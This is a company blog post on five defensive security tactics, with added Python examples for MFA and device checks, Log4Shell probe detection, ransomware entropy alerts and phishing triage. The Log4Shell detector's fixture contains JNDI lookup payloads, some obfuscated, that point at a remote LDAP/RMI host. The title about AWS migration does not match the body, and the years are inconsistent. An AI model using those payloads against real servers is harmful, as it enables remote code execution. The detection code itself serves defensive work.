e360 Blog

Moving to the Cloud with the AWS Well-Architected Framework

Written by Kevin Kohn | Dec 21, 2022 2:19:00 PM

At the end of another action-packed year, cyber professionals set their sights on what is coming over the horizon. 2021 ended with a “bang”, and many cybersecurity teams worked well into the wee hours of the new year combating the Log4j vulnerability (Log4Shell, CVE-2021-44228). Many are still fighting to secure their environments. Why do attacks tend to cluster around the holiday season? It has a lot to do with vacations: from Thanksgiving onward many organizations run on a skeleton crew, so a vulnerability disclosed in December lands when the people who would patch it and watch for exploitation are least available. Given this trend, what can organizations do to prepare for the next incursion and perhaps this time have an uneventful holiday season in 2022? I see five tactics, some new and some age-old basic security principles, that in combination establish a strong organizational security posture not just for the holiday season, but for the entire year.

Identity and Access Management

A significant number of breaches involve either stolen credentials or abuse of privileges. A strong identity and access management program needs to leverage multi-factor authentication (MFA), privileged access management (PAM), and certificate management (CM) to reduce cyber risk. The keys to mitigating identity attacks are verifying that a person is who they claim to be (MFA), verifying that the device they are connecting from is one you issued and still trust (a device certificate), and then granting only the privileges the task requires (PAM). Proper identity management in all aspects of cybersecurity should be the foundation you build the rest of your program on.
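To make the "who is the person, what is the device" point concrete, here is an added example (written for this edit, not e360's code or any product's implementation) that only authorizes a request when both checks succeed. The person is verified with a TOTP code (RFC 6238: HMAC-SHA1, 30-second step, 6 digits), the device by the SHA-256 fingerprint of the certificate it presented. The device inventory, the certificate bytes and the user names are constructed; in a real deployment the client certificate chain is verified during mutual TLS and only then is its fingerprint looked up in the MDM/PKI inventory.

```python
"""Added example (not e360's code): the two checks behind an identity decision.

The person is verified with a TOTP code (RFC 6238: HMAC-SHA1, 30 s step,
6 digits) and the device with the SHA-256 fingerprint of the certificate it
presented. The device inventory and the certificate bytes are constructed;
a real deployment verifies the client certificate chain during mutual TLS
and then looks its fingerprint up in the MDM/PKI inventory.
"""
import hashlib
import hmac
import struct
import time

TIME_STEP = 30
DIGITS = 6
ALLOWED_DRIFT_STEPS = 1  # accept one step either side to tolerate clock skew


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: dynamic truncation of HMAC-SHA1(secret, counter)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return str(code % 10**digits).zfill(digits)


def totp(secret: bytes, at: int, digits: int = DIGITS) -> str:
    """RFC 6238 TOTP: HOTP over the number of TIME_STEP intervals since the epoch."""
    return hotp(secret, at // TIME_STEP, digits)


def verify_totp(secret: bytes, submitted: str, at: int) -> bool:
    """Constant-time comparison against the current step and its neighbours."""
    current = at // TIME_STEP
    for step in range(current - ALLOWED_DRIFT_STEPS, current + ALLOWED_DRIFT_STEPS + 1):
        if hmac.compare_digest(hotp(secret, step), submitted):
            return True
    return False


def cert_fingerprint(cert_der: bytes) -> str:
    """SHA-256 fingerprint of a DER-encoded certificate, the key used in device inventories."""
    return hashlib.sha256(cert_der).hexdigest()


# Constructed inventory: fingerprint -> user the device was issued to.
DEVICE_CERT_ALICE = b"constructed-DER-bytes-laptop-0001"  # stands in for a real DER certificate
MANAGED_DEVICES = {cert_fingerprint(DEVICE_CERT_ALICE): "alice"}


def authorize(user: str, secret: bytes, otp: str, cert_der: bytes, at: int):
    """Allow only when the OTP is valid AND the presented device cert was issued to that user."""
    if not verify_totp(secret, otp, at):
        return False, "mfa_failed"
    owner = MANAGED_DEVICES.get(cert_fingerprint(cert_der))
    if owner is None:
        return False, "unmanaged_device"
    if owner != user:
        return False, "device_owner_mismatch"
    return True, "ok"


if __name__ == "__main__":
    secret = b"12345678901234567890"  # the RFC 6238 SHA-1 test secret
    now = int(time.time())
    print(authorize("alice", secret, totp(secret, now), DEVICE_CERT_ALICE, now))
```

Two things a production implementation adds that this example leaves out: replay protection (a code accepted in one step must be rejected if submitted again in that step) and rate limiting on failed attempts, since a 6-digit code with a three-step window is guessable under unthrottled brute force.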

XDR/VMDR

As much as we would all like, organizations cannot prevent every compromise. Extended Detection and Response (XDR) tools correlate telemetry from endpoints, identity, email, and the network so that a compromise can be contained before it spreads. Combining vulnerability management with detection and response is an emerging capability known as VMDR. Imagine being able to detect a behavior or compromise and patch the underlying vulnerability in near real time, instead of waiting for the weekly or monthly scan, reviewing a report, and only then deciding to act. The legacy way of addressing vulnerabilities is too slow.
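The core of the VMDR idea is a join between what the scanner knows and what the sensors are seeing right now. The added example below (written for this edit; it is not e360's code and not the logic of any XDR/VMDR product) does that join over constructed data: a scanner inventory of three hosts and a handful of constructed web-access log lines, some of which carry the Log4Shell `${jndi:` lookup in the nested-lookup obfuscations (`${lower:j}`, `${::-j}`) that were used to slip past naive string filters. Hosts that are both unpatched and actively being probed come out on top of the remediation queue.

```python
"""Added example (not e360's code, and not any XDR/VMDR product's logic).

Joins a scanner's findings with live detections so that hosts that are both
unpatched and actively being probed go to the top of the remediation queue.
The findings and the web-access log lines are constructed. The detection
looks for the Log4Shell lookup `${jndi:` after undoing the nested-lookup
obfuscations (`${lower:j}`, `${::-j}`) that were used to evade naive filters.
"""
import re
from collections import defaultdict

# Constructed scanner output: host -> findings. "weak-tls-config" is a
# placeholder for a low-severity finding, not a CVE identifier.
FINDINGS = {
    "web-01": [{"id": "CVE-2021-44228", "cvss": 10.0, "patched": False}],
    "web-02": [{"id": "CVE-2021-44228", "cvss": 10.0, "patched": True}],
    "db-01": [{"id": "weak-tls-config", "cvss": 5.3, "patched": False}],
}

# Constructed access-log lines: "<host> <method> <path> <user-agent>".
ACCESS_LOG = [
    'web-01 GET /login "${jndi:ldap://198.51.100.7/a}"',
    'web-01 GET /login "${${lower:j}${upper:n}di:ldap://198.51.100.7/b}"',
    'web-02 GET /index "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/c}"',
    'db-01 GET /health "Mozilla/5.0"',
]

# ${lower:x}, ${upper:x} and ${::-x} all evaluate to the single character x.
_NESTED_LOOKUP = re.compile(r"\$\{(?:lower|upper):(.)\}|\$\{::-(.)\}", re.IGNORECASE)


def normalize(payload: str) -> str:
    """Collapse nested lookups until nothing changes, then lower-case."""
    previous, current = None, payload
    while previous != current:
        previous = current
        current = _NESTED_LOOKUP.sub(lambda m: m.group(1) or m.group(2), current)
    return current.lower()


def is_jndi_probe(line: str) -> bool:
    return "${jndi:" in normalize(line)


def prioritize(findings, log_lines):
    """Return [(host, finding id, probes seen)] ordered by urgency."""
    probes = defaultdict(int)
    for line in log_lines:
        if is_jndi_probe(line):
            probes[line.split(" ", 1)[0]] += 1
    queue = []
    for host, items in findings.items():
        for f in items:
            if f["patched"]:
                continue
            hits = probes.get(host, 0)
            # Live exploitation attempts outrank CVSS; CVSS then breaks ties.
            queue.append(((1 if hits else 0, f["cvss"], hits), host, f["id"], hits))
    queue.sort(key=lambda q: q[0], reverse=True)
    return [(host, fid, hits) for _, host, fid, hits in queue]


if __name__ == "__main__":
    for host, fid, hits in prioritize(FINDINGS, ACCESS_LOG):
        print(f"{host}: {fid} ({hits} probe(s) seen)")
```

Note that web-02 is being probed but is already patched, so it drops out of the patch queue; you still want those probes in the detection pipeline, because they tell you who is targeting you and which other hosts they will try next.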

Ransomware Readiness

Ransomware? Are we still doing this? The answer is yes, and increasingly so. Ransomware is alive, well, and spreading quickly, and organizations continue to be vulnerable to it. To limit the potential impact of a compromise, a ransomware readiness assessment that includes a live-fire exercise with a breach and attack simulation tool is recommended; it identifies the attack vectors that actually work against your environment so they can be remediated, and it shows whether your detections fire when the simulated ransomware starts encrypting. A readiness assessment also lets an organization test its ransomware response playbook, making sure that roles, responsibilities, communications, and processes are set up to respond effectively to a real-world attack.
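One of the detections a live-fire exercise should exercise is the behavioral one: a process rewriting many files in a short window with output that looks encrypted. The added example below (written for this edit; not e360's code, and not the logic of any particular EDR product) implements that over constructed file-write events. It combines two signals, Shannon entropy of the written bytes close to 8 bits per byte and a burst of such writes from a single process within a short window. The process IDs, paths and byte strings are constructed stand-ins for what an EDR/XDR agent or file-system audit log would deliver.

```python
"""Added example (not e360's code): a detection you would validate in a live-fire exercise.

Flags a process that rewrites many files in a short window with contents
that look encrypted. The file events are constructed; a real feed comes
from the EDR/XDR agent or the file-system audit log. Two signals combine:
Shannon entropy of the written bytes near 8 bits/byte, and a burst of such
writes from one process inside BURST_WINDOW seconds.
"""
import math
import os
from collections import defaultdict

ENTROPY_THRESHOLD = 7.5   # bits per byte; documents and source sit well below this
BURST_COUNT = 5           # this many high-entropy rewrites by one process ...
BURST_WINDOW = 10.0       # ... within this many seconds raises an alert


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of data (8.0 means every byte value equally likely)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def detect_bursts(events):
    """events: iterable of (timestamp, pid, path, bytes_written). Returns one alert per bursting pid."""
    high_entropy = defaultdict(list)            # pid -> [(timestamp, path)]
    for ts, pid, path, data in events:
        if shannon_entropy(data) >= ENTROPY_THRESHOLD:
            high_entropy[pid].append((ts, path))

    alerts = []
    for pid, hits in high_entropy.items():
        hits.sort()
        best, start = None, 0
        for end in range(len(hits)):              # sliding window over timestamps
            while hits[end][0] - hits[start][0] > BURST_WINDOW:
                start += 1
            size = end - start + 1
            if size >= BURST_COUNT and (best is None or size > best[0]):
                best = (size, start, end)
        if best:
            size, start, end = best
            paths = [p for _, p in hits[start:end + 1]]
            alerts.append({
                "pid": pid,
                "count": size,
                "first": hits[start][0],
                "last": hits[end][0],
                "extensions": sorted({os.path.splitext(p)[1] for p in paths}),
                "paths": paths,
            })
    return alerts


# Constructed stand-ins: every byte value equally often gives exactly 8.0 bits/byte,
# the signature of ciphertext; the repeated sentence is ordinary plaintext.
CIPHERTEXT_LIKE = bytes(range(256)) * 16
PLAINTEXT_LIKE = b"Quarterly revenue summary, draft 3.\n" * 100

EVENTS = (
    [(i * 0.5, 4242, f"/srv/share/doc{i}.docx.locked", CIPHERTEXT_LIKE) for i in range(8)]
    + [(1.0, 911, "/home/alice/notes.txt", PLAINTEXT_LIKE),
       (120.0, 4242, "/srv/share/late.pdf.locked", CIPHERTEXT_LIKE)]   # outside the window
)

if __name__ == "__main__":
    for alert in detect_bursts(EVENTS):
        print(f"pid {alert['pid']}: {alert['count']} encrypted-looking rewrites "
              f"in {alert['last'] - alert['first']:.1f}s, extensions {alert['extensions']}")
```

The obvious false positives are compressors, backup agents and legitimate encryption tools, all of which write high-entropy output in bursts; tune by allow-listing those process images, and pair the entropy signal with canary files that no legitimate process should ever touch.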

Anti-Phishing

Email remains the most targeted attack vector organizations have to defend. Phishing is a constant threat and one of the top entry points for both ransomware and credential harvesting. Organizations should implement layered anti-phishing protection: filtering and sender-authentication tools at the gateway, plus awareness training for the messages those tools miss. Also consider web and email isolation, which renders untrusted links and attachments in a remote container so that malware never executes on the user's endpoint.
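Gateway-side checks are the part of anti-phishing that can be shown in code. The added example below (written for this edit; not e360's code, and not the logic of any mail-security product) triages three constructed messages: it reads the SPF/DKIM/DMARC outcomes from the Authentication-Results header stamped by our own MTA, ignoring any such header stamped by someone else, and checks the From domain against the brands we protect, including look-alikes built from confusable characters (`exarnple.com`) and one-character typos. The protected domains, the authserv-id and the messages are all constructed.

```python
"""Added example (not e360's code): triage of an inbound message at the gateway.

Combines the authentication results our own MTA stamped (SPF, DKIM, DMARC)
with a check of the From domain against the brands we protect, including
look-alikes built from confusable characters (exarnple.com) and one-character
typos. Messages, domains and the authserv-id are constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr

PROTECTED_DOMAINS = {"example.com", "e360.com"}   # constructed: brands we defend
OUR_AUTHSERV_ID = "mx.example.com"                # constructed: id our MTA stamps
CONFUSABLES = {"0": "o", "1": "l", "rn": "m", "vv": "w"}   # a small subset


def auth_results(msg, authserv_id=OUR_AUTHSERV_ID):
    """SPF/DKIM/DMARC outcomes from the Authentication-Results header we trust."""
    results = {"spf": "none", "dkim": "none", "dmarc": "none"}
    for header in msg.get_all("Authentication-Results", []):
        if not header.strip().startswith(authserv_id):
            continue                      # stamped by someone else: ignore
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header, re.IGNORECASE):
            results[method.lower()] = result.lower()
    return results


def normalize_domain(domain: str) -> str:
    d = domain.lower()
    for src, dst in CONFUSABLES.items():
        d = d.replace(src, dst)
    return d


def levenshtein(a: str, b: str) -> int:
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + (ca != cb)))
        previous = current
    return previous[-1]


_PROTECTED_NORMALIZED = {normalize_domain(p): p for p in PROTECTED_DOMAINS}


def lookalike_of(domain: str):
    """The protected domain this one imitates, or None (an exact match is not a look-alike)."""
    if domain in PROTECTED_DOMAINS:
        return None
    d = normalize_domain(domain)
    if d in _PROTECTED_NORMALIZED:
        return _PROTECTED_NORMALIZED[d]
    for norm, original in _PROTECTED_NORMALIZED.items():
        if levenshtein(d, norm) <= 1:
            return original
    return None


def triage(raw: str) -> dict:
    msg = message_from_string(raw)
    _, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    auth = auth_results(msg)
    reasons = []
    imitated = lookalike_of(domain)
    if imitated:
        reasons.append(f"From domain {domain} imitates {imitated}")
    if domain in PROTECTED_DOMAINS and auth["dmarc"] != "pass":
        reasons.append(f"claims {domain} but DMARC={auth['dmarc']}")
    if "fail" in (auth["spf"], auth["dkim"]):
        reasons.append(f"SPF={auth['spf']} DKIM={auth['dkim']}")
    return {"from_domain": domain, "auth": auth,
            "verdict": "quarantine" if reasons else "deliver", "reasons": reasons}


# Constructed messages (headers only; bodies omitted).
SPOOFED = ("Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=attacker.invalid;"
           " dkim=none; dmarc=fail header.from=example.com\n"
           'From: "IT Helpdesk" <helpdesk@example.com>\nSubject: Your password expires today\n\n')
LOOKALIKE = ("Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=exarnple.com;"
             " dkim=pass header.d=exarnple.com; dmarc=pass header.from=exarnple.com\n"
             "From: helpdesk@exarnple.com\nSubject: Your password expires today\n\n")
LEGIT = ("Authentication-Results: mail.upstream.invalid; spf=fail\n"     # foreign stamp, ignored
         "Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com;"
         " dkim=pass header.d=example.com; dmarc=pass header.from=example.com\n"
         "From: alice@example.com\nSubject: Lunch?\n\n")

if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("look-alike", LOOKALIKE), ("legit", LEGIT)):
        print(name, triage(raw)["verdict"], triage(raw)["reasons"])
```

The look-alike message passes SPF, DKIM and DMARC, because the attacker owns `exarnple.com` and set them up correctly; that is why sender authentication alone is not an anti-phishing control. Two caveats: this code trusts any Authentication-Results header that starts with our authserv-id, so the border MTA must strip incoming headers that claim that id (RFC 8601, section 5) before this runs, and a Levenshtein threshold of 1 will flag short legitimate domains, so tune it by label length or restrict it to the registrable domain.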

Zero Trust Edge

Zero Trust Edge (ZTE), also marketed as Secure Access Service Edge (SASE), is “where the industry is going”. With increased adoption of SaaS services and of cloud computing overall, it makes sense to have a centralized policy decision and enforcement point in the cloud. Imagine having DNS security, cloud firewall capabilities, Data Loss Prevention (DLP), software-defined WAN, a secure web gateway, and an SSL VPN in a single console. With the right ZTE provider, organizations can apply the same policies to legacy on-premises applications and data, so users get the same protection whether the resource lives in the cloud or in the data center.

Defending against attacks and reducing overall cyber risk requires a multilayered approach. We have all been searching for the “silver bullet” of cybersecurity, but one bullet won’t do the job; we need an entire arsenal of tools, processes, and people to combat what is coming. The best chance we have at a less eventful 2022 is to adopt strong identity and access management practices and pair them with zero trust edge. Our endpoints should have XDR capabilities, and we need to be hunting for ransomware before it detonates. Phishing can and should be reduced to a minimal risk category with the right tools and processes, focused on isolation and sender reputation. By embracing the five ideas above, you increase your chances of a peaceful and happy new year.